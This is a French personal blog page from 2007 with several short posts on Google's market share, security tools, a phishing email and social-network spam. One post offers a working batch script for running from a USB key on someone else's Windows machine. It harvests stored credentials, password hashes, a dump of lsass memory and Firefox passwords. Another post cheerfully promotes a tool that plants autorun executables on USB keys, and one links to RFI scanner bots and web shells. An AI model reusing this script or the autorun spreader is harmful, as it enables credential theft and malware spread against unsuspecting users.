articles
réactions
Jeff - 26.12.2007 | 3 réactions | #link | rss
Google, c'est la cinquième plus grosse capitalisation boursière américaine. Un géant qui ne cesse de s'étendre, en tout cas semble-t-il. Sa taille et son ambition lui permettent de s'incruster dans les mobiles, de s'associer à des opérateurs (on parle de NTT DoCoMo), de cibler des populations particulières (financiers, chercheurs, bureautique, etc.). Avec un panel de 40 services.

Sauf qu'à trop surfer sur la vague, en l'ocurrence celle du Web 2.0 (même si ce dernier est plus récent - et n'a d'ailleurs que l'existence que l'on veut bien lui attribuer-), on fini par se retrouver seul sur les galets...

En effet, Google est souvent cité comme référence en termes de réussite. Il n'empêche que les chiffres récemment publiés sur la fréquentation de ses différents services révèlent tout de même un échec relatif de la plupart de ses services. Le géant Google n'arriverait donc pas à se faire une place dans les différents marchés avec un simple claquement de doigts. Ni une multitude de têtes pensantes qui font la renommée de ses campus.

Les chiffres sont disponibles ICI.




Ce qu'ils disent est relativement simple:

  • la quasi-totalité du traffic reste assurée par la recherche de textes et d'images. Le reste? des cacahuètes.

  • certains services ciblés se cassent la gueule (vidéos depuis que Youtube est intégré, achats de produits divers, recherche de papiers académiques, etc.)

  • des services présumés "clés" restent étonnament loin des leaders dans leurs domaines: gmail, par exemple, n'est pas près de détrôner Yahoo! Mail. Au rythme actuel, cela n'arriverait pas avant 2010.

  • les autres services n'ont jamais (pas encore?) réellement décollé: finances, bureautique (des études révèlent que 75% des utilisateurs ne connaissent même pas l'existence de ce service), etc.



Bref, on est loin de la suprématie prévue et attendue. C'est toujours intéressant de constater que les internautes ne sont pas que des moutons ou des consommateurs en puissance.
Jeff - 22.12.2007 | 1 réactions | #link | rss
Après le premier article consacré aux traces laissées dans Windows, la logique voulait que je parle des outils qui permettent de récupérer ces informations, en particulier les mots de passe.

La plupart des outils cités dans ce billet sont utilisables en ligne de commande, ce qui permet donc de les exécuter avec un simple shell (Dos). L'exception concerne Cain, qui aux dernières nouvelles supporterait tellement de fonctionnalités qu'il en devient incontournable.



Une fois ces outils téléchargés, que faire me dira-t-on? Eh bien imaginez une clé USB, avec tous les softs dessus. Le script suivant permet de récolter pas mal d'infos:

## General infos gathering: "set" et "ver" affichent les caractéristiques du système, ipconfig celles du réseau et mountvol les lecteurs
ver > infos.txt
set >> infos.txt
ipconfig /ALL >> infos.txt
mountvol >> infos.txt

## Credentials extraction: ces outils affichent le contenu du protected storage, à savoir les mots de passe enregistrés
pstoreview.exe > log1.txt
creddump.exe > log2.txt

## Hashes dump (cache as well): ces outils tentent d'extraire les hashes Windows, correspondant aux mot de passe de login, même ceux en cache (voir l'article précédent)
pwdump.exe localhost > log3.txt
fgdump.exe -r -k

## Lsass dump: ici, on dump la mémoire d'un processus en cours d'execution - lsass.exe qui contient lui aussi les hashes. Cette procédure est appliquable à d'autres processus.
pmdump.exe -list > plist.txt
type plist.txt | findstr lsass > tmp.txt
FOR /f %%a in (tmp.txt) do set pid=%%a
pmdump.exe %pid% lsass.dump
DEL tmp.txt

## Additional: extrait les mots de passe de firefox. Voir l'article
dumpAutoComplete.exe > firefox.txt


A suivre.
Jeff - 20.12.2007 | 4 réactions | #link | rss

Un petit outil rigolo et sympa qui fera rire vos amis (ou pas): l'USBTick v2.

Le principe est simple: il faut choisir un executable (rigolo lui aussi), l'outil génère un autorun adéquat puis attend qu'une clé USB soit connectée. Lorsque celle-ci est branchée, il copie exe et autorun dessus, et ce automatiquement.

Il y a ensuite de fortes chances pour que l'autorun s'exécute (et donc l'exécutable avec) la prochaine fois que le propriétaire branchera sa clé.

L'aspect rigolo réside bien entendu dans le fait que tout ceci s'effectue automatiquement et discrètement dès qu'une clé est branchée.

J'en connais qui vont rire jaune...

EDIT: project homepage ICI
Jeff - 19.12.2007 | 0 réactions | #link | rss

Alors, tu cliques ici, tu copies là, tu tapes entrée... et c'est tout bon mon petit.

Ou presque.

Ici, c'est là en fait: http://www.ipasvi.roma.it/ita/plugins/spamx/fran2.txt
ou encore http://defaced.serapis.net/filez/scan_bot/Pitbullbot.txt

Voyons. Publique. RFI scanner (pour "remote file include/inclusion") automatisé (bot). Pas mal tout ca, bonne pêche. Encore des gens qui s'acharnent sur les forums en PHP qui fleurissent un peu partout. Par contre, l'italien et moi ca fait 2, et il y a pas mal de caractères bizarres plus bas. Qu'à cela ne tienne, super gogol (Google) à la rescousse, me dit que cela ressemble à la page:

http://nationwide-contest.net/brap6.pl


Page qui n'existe plus, bien sûr, sauf que la mémoire divine de super gogol me donne toujours accès à la version en cache et là, paf! "PRIVATE" version... Gnarf gnarf gnarf...

Quel intérêt me dira-t-on? Euh... En fait, je trouvais juste les fonctions de recherche sympa...

Et pis, on peut creuser plus loin, hein. A partir de "The_Pitbull" et autres charmants acronymes trouvés dans le code, on remonte à des choses bien plus croustillantes:

  • Des forums d'échanges, où l'on peut même trouver une version spéciale pour Noel (qui a dit que les hackers ne croyaient plus au Père Noel?)

  • Des pseudo-sites webs contenant des listes de commandes ou des configurations

  • Des versions modifiées qui ont changé de nom

  • Des web shells PHP bien connus (suivez mon regard -china c'est pour toi-).

  • Des gens qui l'ont testé pour vous (mais que je ne citerai pas). Si si!!


Noel avant l'heure, vous dis-je!
Jeff - 18.12.2007 | 0 réactions | #link | rss
Allez, c'est sympa, c'est malin, voici un guide pour concevoir un écran tactile à partir d'une Wii et de divers appareils (portable, projecteur, etc.)

Et pour ceux que le mec saoule, allez directement aux démonstrations, ca vaut la peine.



Jeff - 17.12.2007 | 0 réactions | #link | rss
Petit framework découvert il y a peu, Inguma semble très prometteur, et pourrait pourquoi pas compléter judicieusement Metasploit sur les aspects découverte et fuzzing.

L'outil a d'ailleurs déjà été repéré par Red Database Security pour ses composants dédiés aux bases Oracle, mais aussi par Darknet en ce qui concerne toutes les autres possibilités qu'il propose: tests HTTP, analyse NetBios et redirection ARP.

En tout cas, le résultat semble suffisament intéressant pour être mentionné.
Jeff - 14.12.2007 | 0 réactions | #link | rss
Ce coup-ci, je me suis presque fait avoir... le lien pointait vers http://www.amazrock.byethost13.com/ et le site est plutot bien fait...

$#@!!


Dear Amazon.com customer,

We recently noticed one or more attempts to log in to your account from a foreign IP address. If you accessed your account while travelling, the unusual login attempts may have been initiated by you. However, if you did not initiate the logins, please visit Amazon.com Inc. as soon as possible to verify your identity.

This is a security measure that will ensure that you are the only person who can access your Amazon account. Thank you for your patience as we work together to protect your account.

To get started, please click the link below and login to your account:

https://www.amazon.com/gp/yourstore/ref=pd_irl_gw/ie=UTF8&signIn=1

Best Regards,
Amazon.com Inc. Security Center
Jeff - 30.10.2007 | 0 réactions | #link | rss
Après le buzz de Martine (http://martine.logeek.com), Squidd a eu l'idée de lancer un buzz sur Oui-Oui.
Quelques extraits:












Bien entendu, le reste de son blog est également à voir, surtout pour les lecteurs machos: http://beteshumaines.blogspot.com/.
Jeff - 26.10.2007 | 13 réactions | #link | rss
Le site badoo est réputé pour ses mauvaises pratiques; j'ai moi-même été piégé tout au début par un mail qui est en fait envoyé automatiquement à tout le carnet d'adresses. Voici un extrait:



Salut !


Juste un petit mot pour t'inviter à venir voir ma nouvelle page sur Internet. J'ai pensé que le site pourrait te plaire alors je t'ai invité, tu n'as plus qu'à confirmer.


http://eu1.badoo.com/..../in/....


A bientôt !

Grâce à ces pratiques, le site a connu une période de gloire, même sîl semble que le nombre de membres soit maintenant en diminution. Je vous invite à aller lire ce petit article.
Jeff - 28.08.2007 | 7 réactions | #link | rss
Premier ou pas, je ne résiste pas à l'envie de me faire l'écho de cette variante intéressante:



Original ici.

Bravo et merci.
FutureBlogs - v.0.8.6beta - Ce site est hébergé par http://monblog.ch